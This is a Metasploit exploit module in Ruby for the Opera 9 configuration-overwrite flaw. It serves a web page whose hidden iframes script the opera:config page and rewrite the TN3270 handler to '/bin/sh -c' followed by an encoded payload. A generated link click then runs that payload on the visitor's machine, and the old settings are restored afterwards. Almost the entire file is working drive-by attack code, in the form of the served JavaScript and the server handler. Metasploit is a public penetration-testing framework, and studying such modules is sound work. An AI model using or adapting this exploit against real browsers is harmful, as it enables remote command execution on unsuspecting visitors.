GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/opera_configoverwrite.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
6
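class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  include Msf::Exploit::Remote::BrowserAutopwn
  # BrowserAutopwn selection metadata: the module is offered to Opera clients
  # up to version 9.10 on Windows or Linux. JavaScript is required because the
  # served page is a single <script> block. No vuln_test is supplied.
  autopwn_info({
    ua_name: HttpClients::OPERA,
    ua_maxver: '9.10',
    os_name: [ OperatingSystems::Match::WINDOWS, OperatingSystems::Match::LINUX ],
    javascript: true,
    rank: ExcellentRanking, # reliable cmd exec, cleans up after itself
    vuln_test: nil
  })

  # Registers the module metadata (name, description, references, payload
  # constraints, targets). Only the Unix command target is active; the
  # Windows target is left commented out in the target list below.
  #
  # @param info [Hash] framework-supplied info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'Opera 9 Configuration Overwrite',
          'Description' => %q{
            Opera web browser in versions <= 9.10 allows unrestricted script
            access to its configuration page, opera:config, allowing an
            attacker to change settings and potentially execute arbitrary
            code.
          },
          'License' => BSD_LICENSE,
          'Author' => [
            'egypt', # stolen from mpack
          ],
          'References' => [
            [ 'OSVDB', '66472'],
          ],
          'Payload' => {
            'EXITFUNC' => 'process',
            'Space' => 2048,
            'DisableNops' => true,
            'BadChars' => ' '
          },
          'Targets' => [
            # [ 'Opera < 9.10 Windows',
            # {
            # 'Platform' => 'win',
            # 'Arch' => ARCH_X86,
            # }
            # ],
            [
              'Opera < 9.10 Unix Cmd',
              {
                'Platform' => 'unix',
                'Arch' => ARCH_CMD
              }
            ],
          ],
          # Not sure when this was disclosed but it's been known since at
          # least March 5, 2007, since that's the release date on the version
          # of mpack I stole this from.
          'DisclosureDate' => '2007-03-05',
          'DefaultTarget' => 0,
          'Notes' => {
            'Reliability' => UNKNOWN_RELIABILITY,
            'Stability' => UNKNOWN_STABILITY,
            'SideEffects' => UNKNOWN_SIDE_EFFECTS
          }
        }
      )
    )
  end

  # Handles every request that reaches the module's HTTP server. A request
  # for the module's resource path gets the generated HTML page; any other
  # path is answered with a 404.
  #
  # @param cli the client connection handed over by the HttpServer mixin
  # @param request the incoming HTTP request (only +uri+ is read here)
  def on_request_uri(cli, request)
    print_status("Got request #{request.uri}")

    case request.uri
    when get_resource
      print_status("Sending #{name}")
      js = generate_evil_js(cli, request)
      # generate_evil_js sends the 404 itself when no payload could be
      # regenerated and then returns nil (provided send_not_found is truthy).
      # Appending nil to a String raises TypeError, so stop here rather than
      # crash the handler after a response has already gone out.
      return unless js

      content = '<body><script>'
      content << js
      content << '</script></body>'
      headers = { 'Content-Type' => 'text/html' }
    else
      print_status("404ing request for #{request.uri}")
      send_not_found(cli)
      return
    end
    send_response_html(cli, content, headers)

    print_status("Done with request #{request.uri}")
  end

  # Builds the script text served for the resource URI. The encoded payload
  # is hex-escaped ('%XX' form) by Rex::Text.to_hex so it survives the nested
  # quoting below; the page decodes it again with unescape().
  #
  # @param cli the client connection, used to regenerate the payload and to
  #   answer with a 404 when no payload could be built
  # @param _request unused
  # @return [String, nil] the script text, or nil when the payload was
  #   unavailable and send_not_found returned a truthy value
  def generate_evil_js(cli, _request)
    # There are a bunch of levels of quotes here, so the easiest way to
    # make everything line up is to hex escape the command to run
    p = regenerate_payload(cli).encoded
    # NOTE(review): if send_not_found returns a falsy value this does not
    # return, and to_hex below is then called with a nil payload.
    send_not_found(cli) && return if !p

    shellcode = Rex::Text.to_hex(p, '%')
    <<~ENDJS
      blank_iframe = document.createElement('iframe');
      blank_iframe.src = 'about:blank';
      blank_iframe.setAttribute('id', 'blank_iframe_window');
      blank_iframe.setAttribute('style', 'display:none');
      document.body.appendChild(blank_iframe);
      blank_iframe_window.eval(
      "config_iframe = document.createElement('iframe');" +
      "config_iframe.setAttribute('id', 'config_iframe_window');" +
      "config_iframe.src = 'opera:config';" +
      "document.body.appendChild(config_iframe);" +
      "cache_iframe = document.createElement('iframe');" +
      "cache_iframe.src = 'opera:cache';" +
      "cache_iframe.onload = function ()" +
      "{" +
      " config_iframe_window.eval" +
      " (\\"" +
      " old_handler = opera.getPreference('Network','TN3270 App');" +
      " old_pref = opera.getPreference('User Prefs','Run TN3270 In Terminal');" +
      " shellcode = '#{shellcode}';" +
      " opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" +
      " opera.setPreference('User Prefs','Run TN3270 In Terminal','0');" +
      " app_link = document.createElement('a');" +
      " app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5..9))}');" +
      " app_link.click();" +
      " setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" +
      " setTimeout(function () {opera.setPreference('User Prefs','Run TN3270 In Terminal',old_pref)},1000);" +
      " \\");" +
      "};" +
      "document.body.appendChild(cache_iframe);" +
      "");
    ENDJS
  end
end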